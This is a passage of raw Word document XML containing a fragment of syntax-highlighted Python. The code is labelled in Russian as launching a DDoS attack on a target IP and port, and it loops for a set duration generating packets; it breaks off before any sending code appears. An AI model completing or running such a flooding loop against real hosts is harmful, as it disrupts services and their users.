          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDB8945" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Начало</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> DDoS-</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>атаки</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>на</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642E02F1" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5433C073" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606AE101" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>while</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="267F99"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">() - </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>start_time</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>duration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>:  </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Атака</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>течение</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>заданного</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>времени</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F46CC69" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="795E26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>generate_packets</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_ip</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>target_port</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1CCB4F" w14:textId="77777777" w:rsidR="00153D51" w:rsidRPr="00CA2491" w:rsidRDefault="00153D51" w:rsidP="00153D51">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        <w:spacing w:line="285" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="AF00DB"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="001080"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>packet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2491">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Consolas"/>
